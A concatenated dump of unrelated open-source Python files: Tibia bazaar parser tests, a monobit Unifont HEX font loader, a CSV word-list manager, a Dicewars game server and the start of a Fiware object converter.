        self.assertEqual(PvpTypeFilter.OPEN_PVP, bazaar.filters.pvp_type)
        self.assertEqual(BattlEyeTypeFilter.PROTECTED, bazaar.filters.battleye)
        self.assertEqual(VocationAuctionFilter.KNIGHT, bazaar.filters.vocation)
        self.assertEqual(1, bazaar.filters.min_level)
        self.assertEqual(1000, bazaar.filters.max_level)
        self.assertEqual(SkillFilter.MAGIC_LEVEL, bazaar.filters.skill)
        self.assertEqual(1, bazaar.filters.min_skill_level)
        self.assertEqual(50, bazaar.filters.max_skill_level)
        self.assertEqual(AuctionOrderBy.SHIELDING, bazaar.filters.order_by)
        self.assertEqual(AuctionOrder.HIGHEST_LATEST, bazaar.filters.order)
        self.assertEqual(AuctionSearchType.ITEM_WILDCARD, bazaar.filters.search_type)

    def test_character_bazaar_from_content_empty(self):
        bazaar = CharacterBazaar.from_content(self.load_resource(FILE_BAZAAR_CURRENT_EMPTY))

        self.assertIsNotNone(bazaar)
        self.assertFalse(bazaar.entries)

    def test_character_bazaar_from_content_history(self):
        bazaar = CharacterBazaar.from_content(self.load_resource(FILE_BAZAAR_HISTORY))

        self.assertIsNotNone(bazaar)
        self.assertEqual(1, bazaar.page)
        self.assertEqual(1449, bazaar.total_pages)
        self.assertEqual(36219, bazaar.results_count)
        self.assertEqual(25, len(bazaar.entries))
        self.assertIsNotNone(bazaar.url)

        auction = bazaar.entries[0]
        self.assertEqual(325058, auction.auction_id)
        self.assertEqual(900, auction.bid)
        self.assertEqual("Rcrazy Illuminati", auction.name)
        self.assertEqual(255, auction.level)
        self.assertEqual("Celebra", auction.world)
        self.assertEqual(Vocation.MASTER_SORCERER, auction.vocation)
        self.assertEqual(Sex.MALE, auction.sex)
        self.assertEqual(BidType.WINNING, auction.bid_type)
        self.assertIsNotNone(auction.character_url)
        self.assertEqual(1, len(auction.displayed_items))
        self.assertEqual(143, auction.outfit.outfit_id)

        first_item = auction.displayed_items[0]
        self.assertEqual(1, first_item.count)
        self.assertEqual(25700, first_item.item_id)
        self.assertEqual("dream blossom staff", first_item.name)
        self.assertIsNotNone(first_item.image_url)

        self.assertIsNone(bazaar.filters)

    def test_character_bazaar_from_content_unrelated(self):
        """Testing parsing an unrelated tibia.com section"""
        content = self.load_resource(self.FILE_UNRELATED_SECTION)
        with self.assertRaises(InvalidContent):
            CharacterBazaar.from_content(content)

    def test_auction_details_from_content_finished(self):
        auction = Auction.from_content(self.load_resource(FILE_AUCTION_FINISHED))

        self.assertIsNotNone(auction)

        # Listing box
        self.assertEqual("Vireloz", auction.name)
        self.assertIn(auction.name, auction.character_url)
        self.assertIn(str(auction.auction_id), auction.url)
        self.assertEqual(1161, auction.level)
        self.assertEqual(Vocation.ROYAL_PALADIN, auction.vocation)
        self.assertEqual(Sex.MALE, auction.sex)
        self.assertEqual("Wintera", auction.world)
        self.assertIsNotNone(auction.outfit)
        self.assertEqual(1322, auction.outfit.outfit_id)
        self.assertEqual(4, len(auction.displayed_items))
        self.assertEqual("gnome armor", auction.displayed_items[0].name)
        self.assertEqual("falcon coif", auction.displayed_items[1].name)
        self.assertEqual("pair of soulstalkers", auction.displayed_items[2].name)
        self.assertEqual("lion spangenhelm", auction.displayed_items[3].name)
        self.assertEqual(330000, auction.bid)
        self.assertEqual(BidType.MINIMUM, auction.bid_type)
        self.assertEqual(AuctionStatus.FINISHED, auction.status)

        self.assertEqual(11715, auction.hit_points)
        self.assertEqual(17385, auction.mana)
        self.assertEqual(23530, auction.capacity)
        self.assertEqual(1270, auction.speed)
        self.assertEqual(0, auction.blessings_count)
        self.assertEqual(23, auction.mounts_count)
        self.assertEqual(35, auction.outfits_count)
        self.assertEqual(16, auction.titles_count)

        self.assertEqual(8, len(auction.skills))
        self.assertEqual(128, auction.skills_map["Distance Fighting"].level)
        self.assertEqual(11.43, auction.skills_map["Distance Fighting"].progress)

        self.assertIsInstance(auction.creation_date, datetime.datetime)
        self.assertEqual(26006721711, auction.experience)
        self.assertEqual(41893, auction.gold)
        self.assertEqual(553, auction.achievement_points)
        self.assertIsNone(auction.regular_world_transfer_available_date)
        self.assertEqual(110, auction.available_charm_points)
        self.assertEqual(5800, auction.spent_charm_points)

        self.assertEqual(2, auction.daily_reward_streak)
        self.assertEqual(1494, auction.hunting_task_points)
        self.assertEqual(0, auction.permanent_hunting_task_slots)
        self.assertEqual(1, auction.permanent_prey_slots)
        self.assertEqual(1, auction.hirelings)
        self.assertEqual(3, auction.hireling_jobs)
        self.assertEqual(0, auction.hireling_outfits)

        self.assertIsNotNone(auction.items)
        self.assertEqual(76, len(auction.items.entries))
        self.assertEqual(8, auction.items.total_pages)
        self.assertEqual(567, auction.items.results)
        self.assertEqual(141, auction.items.get_by_name("cigar").item_id)
        self.assertEqual("cigar", auction.items.get_by_id(141).name)
        self.assertEqual(7, len(auction.items.search('backpack')))

        self.assertIsNotNone(auction.store_items)
        self.assertEqual(16, len(auction.store_items.entries))
        self.assertEqual(1, auction.store_items.total_pages)
        self.assertEqual(16, auction.store_items.results)
        self.assertEqual(23721, auction.store_items.get_by_name("gold pouch").item_id)
        self.assertEqual("gold pouch", auction.store_items.get_by_id(23721).name)
        self.assertEqual(2, len(auction.store_items.search('rune')))

        self.assertIsNotNone(auction.mounts)
        self.assertEqual(22, len(auction.mounts.entries))
        self.assertEqual(1, auction.mounts.total_pages)
        self.assertEqual(22, auction.mounts.results)
        self.assertEqual(387, auction.mounts.get_by_name("donkey").mount_id)
        self.assertEqual("Donkey", auction.mounts.get_by_id(387).name)
        self.assertEqual(1, len(auction.mounts.search('drag')))

        self.assertIsNotNone(auction.store_mounts)
        self.assertEqual(1, len(auction.store_mounts.entries))
        self.assertEqual(1, auction.store_mounts.total_pages)
        self.assertEqual(1, auction.store_mounts.results)
        self.assertEqual(906, auction.store_mounts.get_by_name("Wolpertinger").mount_id)
        self.assertEqual("Wolpertinger", auction.store_mounts.get_by_id(906).name)
        self.assertEqual(1, len(auction.store_mounts.search('Wolpertinger')))

        self.assertIsNotNone(auction.outfits)
        self.assertEqual(30, len(auction.outfits.entries))
        self.assertEqual(2, auction.outfits.total_pages)
        self.assertEqual(33, auction.outfits.results)
        self.assertEqual(151, auction.outfits.get_by_name("pirate").outfit_id)
        self.assertEqual('Glooth Engineer', auction.outfits.get_by_id(610).name)
        self.assertEqual(2, len(auction.outfits.search('demon')))

        self.assertIsNotNone(auction.store_outfits)
        self.assertEqual(2, len(auction.store_outfits.entries))
        self.assertEqual(1, auction.store_outfits.total_pages)
        self.assertEqual(2, auction.store_outfits.results)
        self.assertEqual(962, auction.store_outfits.get_by_name("retro warrior").outfit_id)
        self.assertEqual('Retro Warrior', auction.store_outfits.get_by_id(962).name)
        self.assertEqual(2, len(auction.store_outfits.search('retro')))

        self.assertIsNotNone(auction.familiars)
        self.assertEqual(1, len(auction.familiars.entries))
        self.assertEqual(1, auction.familiars.total_pages)
        self.assertEqual(1, auction.familiars.results)
        self.assertEqual(992, auction.familiars.get_by_name("emberwing").familiar_id)
        self.assertEqual('Emberwing', auction.familiars.get_by_id(992).name)
        self.assertEqual(1, len(auction.familiars.search('ember')))

        self.assertEqual(9, len(auction.blessings))
        self.assertEqual(18, len(auction.imbuements))
        self.assertEqual(8, len(auction.charms))
        self.assertEqual(0, len(auction.completed_cyclopedia_map_areas))
        self.assertEqual(16, len(auction.titles))
        self.assertEqual(217, len(auction.achievements))
        self.assertEqual(509, len(auction.bestiary_progress))
        self.assertEqual(205, len(auction.completed_bestiary_entries))

    def test_auction_details_from_content_finished_skip_details(self):
        auction = Auction.from_content(self.load_resource(FILE_AUCTION_FINISHED), skip_details=True)

        self.assertIsNotNone(auction)

        # Listing box
        self.assertEqual("Vireloz", auction.name)
        self.assertIn(auction.name, auction.character_url)
        self.assertIn(str(auction.auction_id), auction.url)
        self.assertEqual(1161, auction.level)
        self.assertEqual(Vocation.ROYAL_PALADIN, auction.vocation)
        self.assertEqual(Sex.MALE, auction.sex)
        self.assertEqual("Wintera", auction.world)
        self.assertIsNotNone(auction.outfit)
        self.assertEqual(1322, auction.outfit.outfit_id)
        self.assertEqual(4, len(auction.displayed_items))
        self.assertEqual("gnome armor", auction.displayed_items[0].name)
        self.assertEqual("falcon coif", auction.displayed_items[1].name)
        self.assertEqual("pair of soulstalkers", auction.displayed_items[2].name)
        self.assertEqual("lion spangenhelm", auction.displayed_items[3].name)
        self.assertEqual(330000, auction.bid)
        self.assertEqual(BidType.MINIMUM, auction.bid_type)
        self.assertEqual(AuctionStatus.FINISHED, auction.status)

    def test_auction_details_from_content_not_found(self):
        auction = Auction.from_content(self.load_resource(FILE_AUCTION_NOT_FOUND))

        self.assertIsNone(auction)

    def test_auction_details_from_content_unrelated(self):
        """Testing parsing an unrelated tibia.com section"""
        content = self.load_resource(self.FILE_UNRELATED_SECTION)
        with self.assertRaises(InvalidContent):
            Auction.from_content(content)
2.4375
2
monobit/formats/hex.py
robhagemans/monobit
74
12789926
""" monobit.hex - Unifont Hex format (c) 2019--2021 <NAME> licence: https://opensource.org/licenses/MIT """ # HEX format documentation # http://czyborra.com/unifont/ import logging import string from ..storage import loaders, savers from ..streams import FileFormatError from ..font import Font from ..glyph import Glyph @loaders.register('hext', name='PC-BASIC Extended HEX') def load_hext(instream, where=None): """Load 8xN multi-cell font from PC-BASIC extended .HEX file.""" return _load_hex(instream.text) @loaders.register('hex', name='Unifont HEX') def load_hex(instream, where=None): """Load 8x16 multi-cell font from Unifont .HEX file.""" return _load_hex(instream.text) @savers.register(linked=load_hex) def save_hex(fonts, outstream, where=None): """Save 8x16 multi-cell font to Unifont .HEX file.""" font = _validate(fonts) _save_hex(font, outstream.text, _fits_in_hex) @savers.register(linked=load_hext) def save_hext(fonts, outstream, where=None): """Save 8xN multi-cell font to PC-BASIC extended .HEX file.""" font = _validate(fonts) _save_hex(font, outstream.text, _fits_in_hext) def _validate(fonts): """Check if font fits in file format.""" if len(fonts) > 1: raise FileFormatError('Can only save one font to hex file.') font, = fonts if font.spacing not in ('character-cell', 'multi-cell'): raise FileFormatError( 'This format only supports character-cell or multi-cell fonts.' ) return font ############################################################################## # loader def _load_hex(instream): """Load font from a .hex file.""" global_comment = [] glyphs = [] comment = [] for line in instream: line = line.rstrip('\r\n') if ':' in line: # parse code line key, value = line.rsplit(':', 1) value = value.strip() if ( # preserve empty lines if they separate comments (not line and comment and comment[-1] != '') # marked as comment or line[0] == '#' # pass through lines without : as comments - allows e.g. 
to convert diffs, like hexdraw or (':' not in line) # not a valid line, treat as comment or set(value) - set(string.hexdigits + ',') ): comment.append(line) else: # when first glyph is found, split comment lines between global and glyph if not glyphs and comment: global_comment, comment = split_global_comment(comment) glyphs.append(_convert_glyph(key, value, comment)) comment = [] # preserve any comment at end of file as part of global comment global_comment = '\n'.join([*_clean_comment(global_comment), *_clean_comment(comment)]) return Font(glyphs, comments=global_comment, properties=dict(encoding='unicode')) def _convert_label(key): """Ctreate char label from key string.""" try: return ''.join(chr(int(_key, 16)) for _key in key.split(',')) except ValueError: return '' def _convert_glyph(key, value, comment): """Create Glyph object from key string and hex value.""" # determine geometry # two standards: 8-pix wide, or 16-pix wide # if height >= 32, they conflict num_bytes = len(value) // 2 if num_bytes < 32: width, height = 8, num_bytes else: width, height = 16, num_bytes // 2 # get labels char = _convert_label(key) return Glyph.from_hex(value, width, height).modify( char=char, tags=([key] if not char else []), comments=_clean_comment(comment) ) def _clean_comment(lines): """Remove leading characters from comment.""" while lines and not lines[-1]: lines = lines[:-1] if not lines: return [] lines = [_line or '' for _line in lines] # remove "comment char" - non-alphanumeric shared first character firsts = str(set(_line[0:1] for _line in lines if _line)) if len(firsts) == 1 and firsts not in string.ascii_letters + string.digits: lines = [_line[1:] for _line in lines] # remove one leading space if all(_line.startswith(' ') for _line in lines if _line): lines = [_line[1:] for _line in lines] return lines def split_global_comment(lines): """Split top comments into global and first glyph comment.""" while lines and not lines[-1]: lines = lines[:-1] try: splitter = lines[::-1].index('') except ValueError: global_comment = lines lines = [] else: global_comment = lines[:-splitter-1] lines = lines[-splitter:] return global_comment, lines ############################################################################## # saver def _save_hex(font, outstream, fits): """Save 8x16 multi-cell font to Unifont or PC-BASIC Extended .HEX file.""" # global comment if font.get_comments(): outstream.write(_format_comment(font.get_comments(), comm_char='#') + '\n\n') # glyphs for glyph in font.glyphs: if fits(glyph): outstream.write(_format_glyph(glyph)) else: logging.warning('Skipping %s: %s', glyph.char, glyph.as_hex()) def _fits_in_hex(glyph): """Check if glyph fits in Unifont Hex format.""" if len(glyph.char) > 1: logging.warning('Hex format does not support multi-codepoint grapheme clusters.') return False if glyph.height != 16 or glyph.width not in (8, 16): logging.warning( 'Hex format only supports 8x16 or 16x16 glyphs, ' f'glyph {glyph.char} is {glyph.width}x{glyph.height}.' ) return False return True def _fits_in_hext(glyph): """Check if glyph fits in PC-BASIC Extended Hex format.""" if glyph.width not in (8, 16): logging.warning( 'Extended Hex format only supports glyphs of width 8 or 16 pixels, ' f'glyph {glyph.char} is {glyph.width}x{glyph.height}.' ) return False if glyph.height >= 32: logging.warning( 'Extended Hex format only supports glyphs less than 32 pixels high, ' f'glyph {glyph.char} is {glyph.width}x{glyph.height}.' 
) return False return True def _format_glyph(glyph): """Format glyph line for hex file.""" return ( # glyph comment ('' if not glyph.comments else '\n' + _format_comment(glyph.comments, comm_char='#') + '\n') + '{}:{}\n'.format( # label u','.join(f'{ord(_c):04X}' for _c in glyph.char), # hex code glyph.as_hex().upper() ) ) def _format_comment(comment, comm_char): """Format a multiline comment.""" return '\n'.join(f'{comm_char} {_line}' for _line in comment.splitlines())
2.546875
3
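The HEX format the loader above parses is line-oriented: CODEPOINT:HEXDATA, where 32 hex digits encode an 8x16 glyph and 64 encode a 16x16 one. A standalone sketch of that geometry rule, mirroring the logic of _convert_glyph without depending on monobit's internals:

def hex_geometry(value):
    """Width/height implied by a Unifont hex string (mirrors _convert_glyph)."""
    num_bytes = len(value) // 2
    if num_bytes < 32:
        return 8, num_bytes       # 8 pixels wide, one byte per row
    return 16, num_bytes // 2     # 16 pixels wide, two bytes per row

print(hex_geometry('00' * 16))    # (8, 16)  - narrow glyph
print(hex_geometry('0000' * 16))  # (16, 16) - wide glyph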
csv_manager.py
Hey7ude/word-translate-practice
0
12789927
import csv


def open_file_or_create(name: str, mode):
    try:
        return open(name, mode)
    except OSError:
        # File does not exist yet: create it empty, then reopen as requested.
        f = open(name, 'a')
        f.close()
        return open(name, mode)


def import_csv(words_list: list, class_name, filename='data.csv'):
    csv_file = open_file_or_create(filename, 'r')
    csv_reader = csv.DictReader(csv_file)
    for line in csv_reader:
        word = line['word']
        translate = line['translate']
        is_learned = True if line['is_learned'] == 'True' else False
        # 'answers' was written as str(list), e.g. "[True, False]"; strip the
        # brackets and split on commas to recover the booleans.
        answers = line['answers'][1:-1].replace(' ', '').split(',')
        for i in range(len(answers)):
            if answers[i] == 'True':
                answers[i] = True
            elif answers[i] == 'False':
                answers[i] = False
            else:
                answers = []
        words_list.append(class_name(word=word, translate=translate, is_learned=is_learned, answers=answers))
    csv_file.close()


def export_csv(words_list: list, file_name='data.csv'):
    csv_file = open_file_or_create(file_name, 'w')
    csv_writer = csv.DictWriter(csv_file, fieldnames=words_list[0].__dict__.keys())
    csv_writer.writeheader()
    for i in range(len(words_list)):
        csv_writer.writerow(words_list[i].__dict__)
    csv_file.close()
# (a short usage sketch follows this record)
3.4375
3
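A sketch of a record class that satisfies the contract import_csv/export_csv rely on (attributes word, translate, is_learned, answers). The class is illustrative; the original repo's class is not shown in this record:

class Word:
    """Minimal record type matching the CSV columns (assumption)."""
    def __init__(self, word, translate, is_learned=False, answers=None):
        self.word = word
        self.translate = translate
        self.is_learned = is_learned
        self.answers = answers or []

words = [Word('cat', 'chat'), Word('dog', 'chien', True, [True, False])]
export_csv(words, 'demo.csv')   # header comes from Word.__dict__ keys
loaded = []
import_csv(loaded, Word, 'demo.csv')
print(loaded[1].word, loaded[1].answers)  # dog [True, False]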
dicewars/server/game.py
thejoeejoee/SUI-MIT-VUT-2020-2021
0
12789928
import json
from json.decoder import JSONDecodeError
import logging
import random
import socket
import sys

from .player import Player
from .summary import GameSummary

MAX_PASS_ROUNDS = 8
MAX_BATTLES_PER_GAME = 10000  # observed maximum of 5671 over 100k games


class Game:
    """Instance of the game"""

    def __init__(self, board, area_ownership, players, addr, port, nicknames_order):
        """Initialize game and connect clients

        Parameters
        ----------
        players : int
            Number of players
        addr : str
            IP address of the server
        port : int
            Port number

        Attributes
        ----------
        buffer : int
            Size of socket buffer
        number_of_players : int
            Number of players
        """
        self.buffer = 65535
        self.logger = logging.getLogger('SERVER')

        self.address = addr
        self.port = port
        self.number_of_players = players

        self.nb_players_alive = players
        self.nb_consecutive_end_of_turns = 0
        self.nb_battles = 0

        self.create_socket()

        self.board = board
        self.initialize_players()
        self.connect_clients()
        if nicknames_order is not None:
            self.adjust_player_order(nicknames_order)
        self.report_player_order()

        self.assign_areas_to_players(area_ownership)
        self.logger.debug("Board initialized")

        for player in self.players.values():
            self.send_message(player, 'game_start')

        self.summary = GameSummary()

    def run(self):
        """Main loop of the game"""
        from dicewars.ml.game import serialise_game_configuration, save_game_configurations

        configurations = set()

        try:
            for i in range(1, self.number_of_players + 1):
                player = self.players[i]
                self.send_message(player, 'game_state')

            while True:
                self.logger.debug("Current player {}".format(self.current_player.get_name()))
                self.handle_player_turn()

                if self.check_win_condition():
                    sys.stdout.write(str(self.summary))
                    for i, p in self.players.items():
                        if p.get_number_of_areas() == self.board.get_number_of_areas():
                            save_game_configurations(
                                winner_index=i,
                                configurations=configurations,
                            )
                            break
                    break

                serialised_game = serialise_game_configuration(
                    board=self.board,
                    players=self.players,
                )
                configurations.add(serialised_game)

        except KeyboardInterrupt:
            self.logger.info("Game interrupted.")
            for i in range(1, self.number_of_players + 1):
                player = self.players[i]
                self.send_message(player, 'close_socket')
        except (BrokenPipeError, JSONDecodeError) as e:
            self.logger.error("Connection to client failed: {0}".format(e))
        except ConnectionResetError:
            self.logger.error("ConnectionResetError")

        try:
            self.close_connections()
        except BrokenPipeError:
            pass

    ##############
    # GAME LOGIC #
    ##############
    def assign_area(self, area, player):
        """Assign area to a new owner

        Parameters
        ----------
        area : Area
            Area to be assigned new owner to
        player : Player
            New owner
        """
        area.set_owner_name(player.get_name())
        player.add_area(area)

    def handle_player_turn(self):
        """Handle client's message and carry out the action"""
        self.logger.debug("Handling player {} ({}) turn".format(self.current_player.get_name(), self.current_player.nickname))
        player = self.current_player.get_name()
        msg = self.get_message(player)

        if msg['type'] == 'battle':
            self.nb_consecutive_end_of_turns = 0
            battle = self.battle(self.board.get_area_by_name(msg['atk']), self.board.get_area_by_name(msg['def']))
            self.summary.add_battle()
            self.logger.debug("Battle result: {}".format(battle))
            for p in self.players:
                self.send_message(self.players[p], 'battle', battle=battle)

        elif msg['type'] == 'end_turn':
            self.nb_consecutive_end_of_turns += 1
            affected_areas = self.end_turn()
            for p in self.players:
                self.send_message(self.players[p], 'end_turn', areas=affected_areas)

    def get_state(self):
        """Get game state

        Returns
        -------
        dict
            Dictionary containing owner, dice and adjacent areas of each area,
            as well as score of each player
        """
        game_state = {
            'areas': {}
        }

        for a in self.board.areas:
            area = self.board.areas[a]
            game_state['areas'][area.name] = {
                'adjacent_areas': area.get_adjacent_areas_names(),
                'owner': area.get_owner_name(),
                'dice': area.get_dice()
            }

        game_state['score'] = {}
        for p in self.players:
            player = self.players[p]
            game_state['score'][player.get_name()] = player.get_largest_region(self.board)

        return game_state

    def battle(self, attacker, defender):
        """Carry out a battle

        Returns
        -------
        dict
            Dictionary with the result of the battle including information
            about rolled numbers, dice left after the battle, and possible
            new ownership of the areas
        """
        self.nb_battles += 1

        atk_dice = attacker.get_dice()
        def_dice = defender.get_dice()

        atk_pwr = def_pwr = 0

        atk_name = attacker.get_owner_name()
        def_name = defender.get_owner_name()

        # Each side rolls one six-sided die per die on the area.
        for i in range(0, atk_dice):
            atk_pwr += random.randint(1, 6)
        for i in range(0, def_dice):
            def_pwr += random.randint(1, 6)

        battle = {
            'atk': {
                'name': attacker.get_name(),
                'dice': 1,
                'owner': atk_name,
                'pwr': atk_pwr
            }
        }

        attacker.set_dice(1)

        if atk_pwr > def_pwr:
            # The attacker conquers the area; ties go to the defender.
            defender.set_owner_name(atk_name)
            self.players[atk_name].add_area(defender)
            self.players[def_name].remove_area(defender)

            if self.players[def_name].get_number_of_areas() == 0:
                self.eliminate_player(def_name)

            attacker.set_dice(1)
            defender.set_dice(atk_dice - 1)

            battle['def'] = {
                'name': defender.get_name(),
                'dice': atk_dice - 1,
                'owner': atk_name,
                'pwr': def_pwr
            }
        else:
            battle['def'] = {
                'name': defender.get_name(),
                'dice': def_dice,
                'owner': def_name,
                'pwr': def_pwr
            }

        return battle

    def end_turn(self):
        """Handles end turn command

        Returns
        -------
        dict
            Dictionary of affected areas including number of dice in these areas
        """
        affected_areas = []
        player = self.current_player
        dice = player.get_reserve() + player.get_largest_region(self.board)
        if dice > 64:
            dice = 64

        areas = []
        for area in self.current_player.get_areas():
            areas.append(area)

        # Distribute the new dice randomly over the player's areas.
        while dice and areas:
            area = random.choice(areas)
            if not area.add_die():
                areas.remove(area)
            else:
                if area not in affected_areas:
                    affected_areas.append(area)
                dice -= 1

        player.set_reserve(dice)

        self.set_next_player()

        list_of_areas = {}
        for area in affected_areas:
            list_of_areas[area.get_name()] = {
                'owner': area.get_owner_name(),
                'dice': area.get_dice()
            }

        return list_of_areas

    def set_first_player(self):
        """Set first player"""
        for player in self.players:
            if self.players[player].get_name() == self.players_order[0]:
                self.current_player = self.players[player]
                self.logger.debug("Current player: {}".format(self.current_player.get_name()))
                return

    def set_next_player(self):
        """Set next player in order as a current player"""
        current_player_name = self.current_player.get_name()
        current_idx = self.players_order.index(current_player_name)
        idx = self.players_order[(current_idx + 1) % self.number_of_players]
        while True:
            try:
                if self.players[idx].get_number_of_areas() == 0:
                    # Skip eliminated players.
                    current_idx = (current_idx + 1) % self.number_of_players
                    idx = self.players_order[(current_idx + 1) % self.number_of_players]
                    continue
                self.current_player = self.players[idx]
                self.logger.debug("Current player: {}".format(self.current_player.get_name()))
            except IndexError:
                exit(1)
            return

    def eliminate_player(self, player):
        nickname = self.players[player].get_nickname()
        self.summary.add_elimination(nickname, self.summary.nb_battles)
        self.logger.info("Eliminated player {} ({})".format(player, nickname))
        self.nb_players_alive -= 1

    def check_win_condition(self):
        """Check win conditions

        Returns
        -------
        bool
            True if a player has won, False otherwise
        """
        if self.nb_consecutive_end_of_turns // self.nb_players_alive == MAX_PASS_ROUNDS:
            self.logger.info("Game cancelled because the limit of {} rounds of passing has been reached".format(MAX_PASS_ROUNDS))
            for p in self.players.values():
                if p.get_number_of_areas() > 0:
                    self.eliminate_player(p.get_name())
            self.process_win(None, -1)
            return True

        if self.nb_battles == MAX_BATTLES_PER_GAME:
            self.logger.info("Game cancelled because the limit of {} battles has been reached".format(MAX_BATTLES_PER_GAME))
            for p in self.players.values():
                if p.get_number_of_areas() > 0:
                    self.eliminate_player(p.get_name())
            self.process_win(None, -1)
            return True

        for p in self.players:
            player = self.players[p]
            if player.get_number_of_areas() == self.board.get_number_of_areas():
                self.process_win(player.get_nickname(), player.get_name())
                return True

        return False

    def process_win(self, player_nick, player_name):
        self.summary.set_winner(player_nick)
        self.logger.info("Player {} ({}) wins!".format(player_nick, player_name))
        for i in self.players:
            self.send_message(self.players[i], 'game_end', winner=player_name)

    ##############
    # NETWORKING #
    ##############
    def get_message(self, player):
        """Read message from client

        Parameters
        ----------
        player : int
            Name of the client

        Returns
        -------
        str
            Decoded message from the client
        """
        raw_message = self.client_sockets[player].recv(self.buffer)
        msg = json.loads(raw_message.decode())
        self.logger.debug("Got message from client {}; type: {}".format(player, msg['type']))
        return msg

    def send_message(self, client, type, battle=None, winner=None, areas=None):
        """Send message to a client

        Parameters
        ----------
        client : Player
            Recipient of the message
        type : str
            Type of message
        battle : dict
            Result of a battle
        winner : int
            Winner of the game
        areas : list of int
            Areas changed during the turn
        """
        self.logger.debug("Sending msg type '{}' to client {}".format(type, client.get_name()))
        if type == 'game_start':
            msg = self.get_state()
            msg['type'] = 'game_start'
            msg['player'] = client.get_name()
            msg['no_players'] = self.number_of_players
            msg['current_player'] = self.current_player.get_name()
            msg['board'] = self.board.get_board()
            msg['order'] = self.players_order
        elif type == 'game_state':
            msg = self.get_state()
            msg['type'] = 'game_state'
            msg['player'] = client.get_name()
            msg['no_players'] = self.number_of_players
            msg['current_player'] = self.current_player.get_name()
        elif type == 'battle':
            msg = self.get_state()
            msg['type'] = 'battle'
            msg['result'] = battle
        elif type == 'end_turn':
            msg = self.get_state()
            msg['type'] = 'end_turn'
            msg['areas'] = areas
            msg['current_player'] = self.current_player.get_name()
            msg['reserves'] = {
                i: self.players[i].get_reserve() for i in self.players
            }
        elif type == 'game_end':
            msg = {
                'type': 'game_end',
                'winner': winner
            }
        elif type == 'close_socket':
            msg = {'type': 'close_socket'}

        msg = json.dumps(msg)
        client.send_message(msg + '\0')

    def create_socket(self):
        """Initiate server socket"""
        try:
            self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            self.socket.bind((self.address, self.port))
            self.logger.debug("Server socket at {}:{}".format(self.address, self.port))
        except OSError as e:
            self.logger.error("Cannot create socket. {0}.".format(e))
            exit(1)

    def connect_clients(self):
        """Connect all clients"""
        self.client_sockets = {}
        self.socket.listen(self.number_of_players)
        self.logger.debug("Waiting for clients to connect")

        for i in range(1, self.number_of_players + 1):
            self.connect_client(i)
            hello_msg = self.get_message(i)
            if hello_msg['type'] != 'client_desc':
                raise ValueError("Client sent a wrong-type hello message '{}'".format(hello_msg))
            self.players[i].set_nickname(hello_msg['nickname'])
        self.logger.debug("Successfully assigned clients to all players")

    def connect_client(self, i):
        """Assign client to an instance of Player"""
        sock, client_address = self.socket.accept()
        self.add_client(sock, client_address, i)

    def add_client(self, connection, client_address, i):
        """Add client's socket to an instance of Player

        Parameters
        ----------
        connection : socket
            Client's socket
        client_address : (str, int)
            Client's address and port number
        i : int
            Player's name

        Returns
        -------
        Player
            Instance of Player that the client was assigned to
        """
        self.client_sockets[i] = connection
        player = self.assign_player_to_client(connection, client_address)
        if not player:
            raise Exception("Could not assign player to client {}".format(client_address))
        else:
            return player

    def assign_player_to_client(self, socket, client_address):
        """Add client's socket to an unassigned player"""
        player = self.get_unassigned_player()
        if player:
            player.assign_client(socket, client_address)
            return player
        else:
            return False

    def get_unassigned_player(self):
        """Get a player with unassigned client"""
        for player in self.players:
            if not self.players[player].has_client():
                return self.players[player]
        return False

    def close_connections(self):
        """Close server's socket"""
        self.logger.debug("Closing server socket")
        self.socket.close()

    ##################
    # INITIALIZATION #
    ##################
    def initialize_players(self):
        self.players = {}
        for i in range(1, self.number_of_players + 1):
            self.players[i] = Player(i)

        self.players_order = list(range(1, self.number_of_players + 1))
        random.shuffle(self.players_order)

        self.set_first_player()
        self.logger.debug("Player order {0}".format(self.players_order))

    def assign_areas_to_players(self, ownership):
        """Assigns areas to players at the start of the game"""
        assert (len(ownership) == self.board.get_number_of_areas())

        for area_name, player_name in ownership.items():
            area = self.board.get_area_by_name(area_name)
            self.assign_area(area, self.players[player_name])

    def adjust_player_order(self, nicknames_order):
        renumbering = {old_name: nicknames_order.index(player.nickname) + 1 for old_name, player in self.players.items()}
        self.players = {renumbering[old_name]: player for old_name, player in self.players.items()}
        for name, player in self.players.items():
            player.name = name
        self.client_sockets = {renumbering[old_name]: socket for old_name, socket in self.client_sockets.items()}

        registered_nicknames_rev = {player.nickname: player_name for player_name, player in self.players.items()}
        assert (len(nicknames_order) == len(registered_nicknames_rev))
        assert (set(nicknames_order) == set(registered_nicknames_rev.keys()))

        self.players_order = []
        for nick in nicknames_order:
            self.players_order.append(registered_nicknames_rev[nick])
        self.set_first_player()

    def report_player_order(self):
        self.logger.info('Player order: {}'.format([(name, self.players[name].nickname) for name in self.players_order]))
# (a short probability sketch follows this record)
2.96875
3
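The server above frames every outgoing message as JSON terminated by a '\0' byte, while get_message assumes a single recv() returns exactly one complete message, which TCP does not guarantee. A minimal sketch of reading up to the terminator instead; recv_json_message is a hypothetical helper, not part of the original server, and it simply discards any bytes that arrive after the terminator:

import json
import socket


def recv_json_message(sock: socket.socket, buffer_size: int = 4096) -> dict:
    """Read bytes until the '\\0' terminator, then decode one JSON message.

    Hypothetical helper: the original get_message relies on one recv() call
    returning a whole message.
    """
    chunks = []
    while True:
        chunk = sock.recv(buffer_size)
        if not chunk:
            raise ConnectionError("socket closed before message terminator")
        head, sep, _rest = chunk.partition(b"\0")
        chunks.append(head)
        if sep:  # terminator found; _rest (bytes after it) is discarded here
            break
    return json.loads(b"".join(chunks).decode())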
gluoncv/data/video_custom/__init__.py
Kentwhf/gluon-cv
48
12789929
<reponame>Kentwhf/gluon-cv<gh_stars>10-100
# pylint: disable=wildcard-import
"""Video related tasks. Custom data loader"""
from __future__ import absolute_import
from .classification import *
1.03125
1
object_fiware_converter.py
iml130/FiwareObjectConverter
0
12789930
# Copyright 2018 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""This module converts Python objects into the Fiware JSON format.

For more information on how to use this class, see the Readme.md.
The files needed to convert an object into JSON are in the folder
JsonToObject, and vice versa.
"""

import json
import os
import sys

